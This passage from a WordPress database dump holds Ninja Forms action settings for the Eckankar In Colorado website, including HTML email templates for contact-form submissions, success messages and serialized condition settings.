/>\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_130}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_131}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_132}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_133}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_134}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166597727}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_138}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_130},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Longmont ECK Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_130}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_131}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_132}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_133}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_134}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166597727}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_138}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p>Your submission is being forwarded to the person that you have selected and you will be contacted soon.</p><br /><br />\r\n<br /><br />\r\nIf you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>'),(1496,58,'label','Send copy to user','label','Send copy to user'),(1497,58,'objectType','Action','objectType','Action'),(1498,58,'objectDomain','actions','objectDomain','actions'),(1499,58,'editActive','','editActive',''),(1500,58,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1501,58,'payment_gateways','','payment_gateways',''),(1502,58,'payment_total','0','payment_total','0'),(1503,58,'tag','','tag',''),(1504,58,'email_message_plain','','email_message_plain',''),(1505,58,'parent_id','15','parent_id','15'),(1506,59,'title','','title',''),(1507,59,'key','','key',''),(1508,59,'type','successmessage','type','successmessage'),(1509,59,'active','1','active','1'),(1510,59,'created_at','2018-01-03 11:44:14','created_at','2018-01-03 11:44:14'),(1511,59,'date_updated','2016-01-15','date_updated','2016-01-15'),(1512,59,'success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>','success_msg','<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p>\n</div>'),(1513,59,'from_name','','from_name',''),(1514,59,'from_address','','from_address',''),(1515,59,'to','{wp:admin_email}','to','{wp:admin_email}'),(1516,59,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1517,59,'email_message','{fields_table}','email_message','{fields_table}'),(1518,59,'attach_csv','0','attach_csv','0'),(1519,59,'email_format','html','email_format','html'),(1520,59,'reply_to','','reply_to',''),(1521,59,'cc','','cc',''),(1522,59,'bcc','','bcc',''),(1523,59,'redirect_url','','redirect_url',''),(1524,59,'label','Success Message','label','Success Message'),(1525,59,'objectType','Action','objectType','Action'),(1526,59,'objectDomain','actions','objectDomain','actions'),(1527,59,'editActive','','editActive',''),(1528,59,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1529,59,'payment_gateways','','payment_gateways',''),(1530,59,'payment_total','0','payment_total','0'),(1531,59,'tag','','tag',''),(1532,59,'email_message_plain','','email_message_plain',''),(1533,59,'parent_id','15','parent_id','15'),(1534,60,'title','','title',''),(1535,60,'key','','key',''),(1536,60,'type','email','type','email'),(1537,60,'active','1','active','1'),(1538,60,'created_at','2018-01-03 11:44:14','created_at','2018-01-03 11:44:14'),(1539,60,'date_updated','2016-01-19','date_updated','2016-01-19'),(1540,60,'from_name','Longmont Initiators and ESAâs','from_name','Longmont Initiators and ESAâs'),(1541,60,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1542,60,'to','webmaster@eckankar-colorado.org','to','webmaster@eckankar-colorado.org'),(1543,60,'email_subject','ECK Colorado Website - Form Record Received','email_subject','ECK Colorado Website - Form Record Received'),(1544,60,'email_message','<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br>  <br> </strong><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Longmont ECK Leadership organization</em>.<br><br> <strong><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br></td></tr></tbody></table><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_email_1515013520503}</span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p>','email_message','<br><br><br><br><br><br><table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><br><br><br><br><br><br><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br ></td>                                \" valign=\"top\"><br><h1>Eckankar In Colorado</h1><br></td><td> </td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><br><p><strong>Hello! You have a new <span style=\"color: #23507d\">Johnstown Initiators and ESAâs</span> form submission.<br>  <br> </strong><br><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for the <em>Longmont ECK Leadership organization</em>.<br><br> <strong><br><br>The following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #333333\">{field:firstname_1515012036721} {field:lastname_1515012040393}</span> has submitted:</strong></p><br></td></tr></tbody></table><br><br><br><br><br><br><br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br ></td>                                \" valign=\"top\"><br><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:firstname_1515012036721}<br><br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_1515012040393}<br><br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong><span data-tag=\"{field:email_1515012046399}\"> {field:email_1515012046399}</span><br><br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_1515012055554}</span><br><br> <span style=\"color: #333333\"><strong>LOCAL AREA: </strong>{field:your_local_area_1515013258725}<br><br> </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_email_1515013520503}</span></p><br><p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:enter_your_message_here_1515013766874}</span></p><br></td></tr></tbody></table><br></td></tr><tr><td align=\"center\" valign=\"top\"><br><br><br><br><br><br><br><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br><br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br></td></tr></tbody></table><br></td></tr></tbody></table><br></td></tr></tbody></table><br><p> </p>'),(1545,60,'attach_csv','0','attach_csv','0'),(1546,60,'email_format','html','email_format','html'),(1547,60,'reply_to','','reply_to',''),(1548,60,'cc','','cc',''),(1549,60,'bcc','','bcc',''),(1550,60,'redirect_url','','redirect_url',''),(1551,60,'success_msg','','success_msg',''),(1552,60,'label','Admin Email','label','Admin Email'),(1553,60,'objectType','Action','objectType','Action'),(1554,60,'objectDomain','actions','objectDomain','actions'),(1555,60,'editActive','','editActive',''),(1556,60,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1557,60,'payment_gateways','','payment_gateways',''),(1558,60,'payment_total','0','payment_total','0'),(1559,60,'tag','','tag',''),(1560,60,'email_message_plain','','email_message_plain',''),(1561,60,'drawerDisabled','','drawerDisabled',''),(1562,60,'parent_id','15','parent_id','15'),(1563,61,'title','','title',''),(1564,61,'key','','key',''),(1565,61,'type','save','type','save'),(1566,61,'active','1','active','1'),(1567,61,'created_at','2018-01-03 11:43:02','created_at','2018-01-03 11:43:02'),(1568,61,'label','Save Form','label','Save Form'),(1569,61,'objectType','Action','objectType','Action'),(1570,61,'objectDomain','actions','objectDomain','actions'),(1571,61,'editActive','','editActive',''),(1572,61,'conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}','conditions','a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}'),(1573,61,'payment_gateways','','payment_gateways',''),(1574,61,'payment_total','0','payment_total','0'),(1575,61,'tag','','tag',''),(1576,61,'to','{wp:admin_email}','to','{wp:admin_email}'),(1577,61,'reply_to','','reply_to',''),(1578,61,'email_subject','Ninja Forms Submission','email_subject','Ninja Forms Submission'),(1579,61,'email_message','{fields_table}','email_message','{fields_table}'),(1580,61,'email_message_plain','','email_message_plain',''),(1581,61,'from_name','','from_name',''),(1582,61,'from_address','','from_address',''),(1583,61,'email_format','html','email_format','html'),(1584,61,'cc','','cc',''),(1585,61,'bcc','','bcc',''),(1586,61,'redirect_url','','redirect_url',''),(1587,61,'parent_id','16','parent_id','16'),(1588,62,'title','','title',''),(1589,62,'key','','key',''),(1590,62,'type','email','type','email'),(1591,62,'active','1','active','1'),(1592,62,'created_at','2018-01-03 11:43:02','created_at','2018-01-03 11:43:02'),(1593,62,'date_updated','2016-01-15','date_updated','2016-01-15'),(1594,62,'from_name','Eckankar In Colorado','from_name','Eckankar In Colorado'),(1595,62,'from_address','webmaster@eckankar-colorado.org','from_address','webmaster@eckankar-colorado.org'),(1596,62,'to','{field:email_47}','to','{field:email_47}'),(1597,62,'email_subject','Loveland Leadership Communications','email_subject','Loveland Leadership Communications'),(1598,62,'email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_45},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>','email_message','<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_45},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Loveland Leadership Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_45}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_46}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_47}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_48}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_49}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_52}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_53}</span></p><br /><br />\r\n</td><br /><br 